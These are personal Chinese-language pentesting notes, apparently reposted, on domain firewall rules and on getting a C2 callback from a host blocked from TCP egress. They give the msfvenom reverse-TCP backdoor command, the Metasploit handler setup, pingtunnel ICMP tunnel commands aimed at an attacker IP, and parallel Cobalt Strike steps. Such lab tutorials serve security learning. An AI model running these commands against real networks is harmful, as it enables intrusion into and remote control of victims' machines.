2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步

用途:个人在线笔记,有所借鉴,欢迎指正

隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

1、防火墙出站入站规则理解

有防火墙的服务器上搭建了一个web应用,有人去访问这个web,对该服务器而言,思考

(1).判断会进入入规则还是出规则?       答案:入站规则
(2).该服务器上有个后门,执行了后门,判断会进入入站规则还是出站规则?

答案:取决于后门是正向连接还是反向连接,正向连接则进入入站规则,反向连接则进入出站规则

2、防火墙出入站规则设置

阻止指定端口通信:换端口绕过

阻止指定协议通信:换协议绕过,若协议阻止,向下兼容

2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步_第1张图片

3、域控主机设置组策略同步

强制更新组策略同步命令:gpupdate/force

所有域成员主机都会应用该域策略设置,从而达到同步更新

4、域控-防火墙-组策略不出网

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP协议出网,其中规则为出站规侧,安全研究者通过入站取得shell权限,需要对其进行上线控制。

运行木马后无法上线,且该主机可以ping通外部,但是无法浏览器访问,ping命令是ICMP协议
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)

ICMP协议项目:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

本次下载使用pingtunnel,  肉机和攻击机都需要安装,肉机客户端,攻击机服务端

window64位安装arm64版,32位安装amd64版,Kali安装linux-amd64版

MSF上线——TCP协议数据封装成ICMP协议数据上线

1、攻击机Kali生成后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe test.exe


2、MSF启动监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

3、肉机开启隧道/将本地3333icmp协议数据转发至攻击主机的4444流量上(管理员运行)

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.139.130 -t 192.168.139.130:4444 -tcp 1 -noprint 1 -nolog 1

4、Kali开启隧道,接收肉机icmp数据:

/pingtunnel -type server

5、肉机执行后门test.exe,直接上线

CS上线——TCP协议数据封装成ICMP协议数据上线

1、新建两个监听器,一个用于生成后门,一个用于监听上线

2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步_第2张图片

2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步_第3张图片

2、生成后门,选择监听器,流量到肉机本地127.0.0.1,3333端口

2、内网安全-域防火墙-入站出站规则-不出网隧道上线-组策略对象同步_第4张图片

3、肉机执行命令(管理员运行)将本地tcp数据包封装成ICMP转发至攻击机4444端口

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.139.130 -t 192.168.139.130:4444 -tcp 1 -noprint 1 -nolog 1

4、攻击机执行命令,与肉机建立隧道,接收ICMP协议数据

./pingtunnel -type server

5、肉机执行后门上线 

你可能感兴趣的:(内网安全/渗透,网络安全,网络协议,信息与通信,http,windows)